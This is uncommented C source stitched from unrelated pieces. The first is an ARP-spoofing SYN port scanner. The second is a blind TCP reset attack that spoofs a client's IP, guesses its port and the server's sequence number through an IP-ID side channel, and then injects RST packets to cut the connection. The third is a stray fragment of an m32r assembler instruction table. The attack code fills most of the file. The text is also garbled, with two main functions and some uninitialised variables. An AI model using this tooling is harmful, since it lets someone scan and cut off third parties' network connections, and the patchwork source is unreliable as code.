int
main(int argc, char **argv)
{
struct layer *head,*tcp;
struct TCPSocket ts;
struct MAC imac,dmac;
uint32_t ip,dip,gip;
uint16_t eport;
int n;
if(argc < 6)
usage(*argv);
if(if_menu(&imac) < 0)
exit(1);
str_to_ip(argv[1],&ip);
str_to_ip(argv[2],&dip);
str_to_ip(argv[5],&gip);
if( ARPRequest(&imac,&dmac,ip,gip,5) < 0 ){
fprintf(stderr,"error: no route to host.\n");
exit(1);
}
ARPReply(&imac,ip,&dmac,gip);
eport = atoi(argv[4]);
createSocket(&ts,&imac,&dmac,ip,dip,atoi(argv[3]),atoi(argv[3]));
filterDatalink("tcp");
head = NULL;
while(!kbhit()){
if(ts.hostport++ < eport)
SYN(&ts);
if( ( head = recvlayers(&n) ) == NULL)
continue;
if( (tcp = findlayer(head,LT_TCP) ) != NULL ){
struct tcphdr *t;
t = (xtcp)tcp->proto;
if( ( ( t->th_flags & TH_SYN ) == TH_SYN) && ( ( t->th_flags & TH_ACK ) == TH_ACK) ){
printf("recv: SYN-ACK from port %d\n",ntohs(t->th_sport));
printlayers(tcp);
RST(&ts);
}
}
rmlayers(head);
}
closeDatalink();
exit(0);
}
int
main(int argc, char **argv)
{
struct layer *proto;
struct MAC localmac,gwmac,cli_mac;
uint32_t real_ip,spoof_ip,gw_ip,client_ip,server_ip,dly,
dly_serv;
struct TCPSocket ts;
struct datalink icmp_dl,dl;
uint16_t start_port,end_port,server_port,
ip_id_a,ip_id_b,ip_id_d;
unsigned long i;
unsigned short guess_port,min_delta=-1;
unsigned long guess_serv_seq,serv_seq=0;
uint32_t start_guess,end_guess;
int guess_inc;
char icmp_filter[256];
if( argc < 9 )
usage(*argv);
if( argc >= 10){
errno = 0;
serv_seq = strtoul(argv[9],NULL,10);
if(errno)
serv_seq =0;
}
srand(time(NULL));
memset(&dl,0,sizeof(dl));
if( if_openbyname(&dl,argv[1]) < 0 ){
fprintf(stderr,"open_link_byname failed\n");
return 1;
}
memset(&icmp_dl,0,sizeof(dl));
if( if_openbyname(&icmp_dl,argv[1]) < 0 ){
fprintf(stderr,"open_link_byname failed\n");
return 1;
}
guess_port = start_port;
str_to_ip(argv[2],&real_ip);
str_to_ip(argv[3],&gw_ip);
str_to_ip(argv[4],&spoof_ip);
str_to_ip(argv[5],&server_ip);
memcpy(&localmac.mac,dl.dl_mac,6);
snprintf(icmp_filter,sizeof(icmp_filter),"icmp and icmp[0] = 0 and "
"((src %s and dst %s) or (src %s and dst %s))",
argv[4],argv[2],argv[5],argv[2]);
filterDatalink(&icmp_dl,icmp_filter);
if( dl.dl_pcap->linktype == DLT_EN10MB ){
if( ARPRequest(&dl,&localmac,&gwmac,real_ip,server_ip,5) < 0 ){
fprintf(stderr,"lan gateway did not reply arp\n");
exit(1);
}
if( ARPRequest(&dl,&localmac,&cli_mac,real_ip,spoof_ip,5) < 0 ){
fprintf(stderr,"lan gateway did not reply arp\n");
exit(1);
}
}
start_port = atoi(argv[6]);
end_port = atoi(argv[7]);
server_port = atoi(argv[8]);
createSocket(&ts,&localmac,&gwmac,spoof_ip,
server_ip,start_port,server_port);
ts.rcvwin = 0;
ip_id_a = ip_id_b = ip_id_d = 0;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,server_ip,
&dly,&ip_id_a);
printf("delay to server= %lu\n",dly_serv);
echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip,
&dly,&ip_id_a);
printf("delay = %lu\n",dly);
for( i = start_port; i<= end_port; i++ ){
SYN(&ts,&dl);
usleep((dly+dly_serv));
echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
ip_id_a = ip_id_b;
if(ip_id_d < min_delta){
min_delta = ip_id_d;
guess_port = i;
}
printf("for port %d ip_id delta = %x\n",ts.port,ip_id_d); if(ip_id_d == 0 ){
printf( " the client port is: %d\n",ts.port); exit(0);
}
ts.port++;
ts.seq++;
}
printf("guessed port is %d\n",guess_port);
ts.ip = server_ip;
ts.port = server_port;
ts.hostip = spoof_ip;
ts.hostport = guess_port;
printf("finding serv.seq using 16k window\n");
min_delta = -1;
if(serv_seq != 0 ){
ts.seq = serv_seq+65536;
ts.gatewaymac = cli_mac;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_a);
ts.ack = 0;
ACK(&ts,&dl);
//ts.ack = 2<<30;
//ACK(&ts,&dl);
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
printf("for seq %lu delta = %d\n",serv_seq,ip_id_d);
ts.seq = serv_seq;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_a);
ts.ack = 0;
ACK(&ts,&dl);
//ts.ack = 2<<30;
//ACK(&ts,&dl);
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
printf("for seq %lu delta = %d\n",serv_seq+65536,ip_id_d);
closeDatalink(&dl);
closeDatalink(&icmp_dl);
exit(0);
}
ip_id_a = ip_id_b = ip_id_d = 0;
ts.gatewaymac = cli_mac;
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_a);
start_guess = 0xffffffff;
end_guess = 16385;
guess_inc = -16384;
for( i = start_guess; abs(end_guess-i)>=0 ; i +=guess_inc ){
ts.ack = 0;
ts.seq = i;
ACK(&ts,&dl);
//ts.ack = 2<<30;
//ts.seq=i;
ACK(&ts,&dl);
echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
&dly,&ip_id_b);
ip_id_d = ip_id_b - ip_id_a;
ip_id_a = ip_id_b;
if(ip_id_d < min_delta){
min_delta = ip_id_d;
guess_serv_seq = i;
if(min_delta == 1)
{
printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d);
RST(&ts,&dl);
exit(0);
}
}
printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d);
}
printf("guessed sequence = %lu\n",guess_serv_seq);
ts.seq = guess_serv_seq;
RST(&ts,&dl);
closeDatalink(&dl);
closeDatalink(&icmp_dl);
return 0;
}
/* f-op1.number.f-r1.dr.f-op2.number.f-r2.src2.f-uimm16.number. */
/* 31 */ { 32, 32, 0xf0f0ffff },
};
#define A(a) (1 << CGEN_CAT3 (CGEN_INSN,_,a))
#define SYN(n) (& syntax_table[n])
#define FMT(n) (& format_table[n])
const CGEN_INSN m32r_cgen_insn_table_entries[MAX_INSNS] =
{
/* null first entry, end of all hash chains */
{ { 0 }, 0 },
/* add $dr,$sr */
{
{ 1, 1, 1, 1 },
"add", "add", SYN (0), FMT (0), 0xa0,
{ 2, 0|A(PARALLEL), { (1<<MACH_M32R) } }
},
/* add3 $dr,$sr,#$slo16 */
{
{ 1, 1, 1, 1 },
"add3", "add3", SYN (1), FMT (1), 0x80a00000,
{ 2, 0, { (1<<MACH_M32R) } }
},
/* add3 $dr,$sr,$slo16 */
{
{ 1, 1, 1, 1 },
"add3.a", "add3", SYN (2), FMT (1), 0x80a00000,
{ 2, 0|A(ALIAS), { (1<<MACH_M32R) } }
},
/* and $dr,$sr */
